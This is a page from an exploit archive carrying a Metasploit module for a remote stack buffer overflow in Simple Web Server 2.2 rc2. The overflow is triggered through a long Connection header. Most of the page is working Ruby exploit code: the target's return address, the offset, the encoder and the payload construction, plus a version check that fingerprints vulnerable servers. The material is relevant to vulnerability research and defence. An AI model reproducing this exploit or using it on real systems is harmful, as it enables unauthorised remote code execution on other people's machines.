Simple Web Server Connection Header Buffer Overflow

2012.07.24

Credit: juan

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-119

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info={})
        super(update_info(info,
            'Name'        => "Simple Web Server Connection Header Buffer Overflow",
            'Description' => %q{
                This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
                can send a long string data in the Connection Header to causes an overflow on the
                stack when function vsprintf() is used, and gain arbitrary code execution. The
                module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
            },
            'License'     => MSF_LICENSE,
            'Author'      =>
                [
                    'mr.pr0n', # Vulnerability Discovery and PoC
                    'juan' # Metasploit module
                ],
            'References' =>
                [
                    ['EDB', '19937'],
                    ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
                ],
            'Payload'    =>
                {
                    'BadChars' => "\x00\x0a\x0d",
                    'Space' => 2048,
                    'DisableNops' => true,
                    'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
                },
            'DefaultOptions' =>
                {
                    'EXITFUNC' => "process",
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    [
                        'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
                        {
                            'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
                            'Offset' => 2048,
                            'OffsetEDI' => 84
                        }
                    ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jul 20 2012",
            'DefaultTarget'  => 0))
    end
 
    def check
        res = send_request_raw({'uri'=>'/'})
        if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
            return Exploit::CheckCode::Vulnerable
        end
 
        return Exploit::CheckCode::Safe
    end
 
    def exploit
 
        sploit = payload.encoded
        sploit << rand_text(target['Offset'] - sploit.length)
        sploit << [target.ret].pack("V") # eip
        sploit << rand_text(target['OffsetEDI'])
        sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string
 
        print_status("Trying target #{target.name}...")
 
        connect
 
        send_request_cgi({
            'uri'        => '/',
            'version'    => '1.1',
            'method'     => 'GET',
            'connection' => sploit
        })
 
        disconnect
 
    end
end

References:

http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Simple Web Server Connection Header Buffer Overflow

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.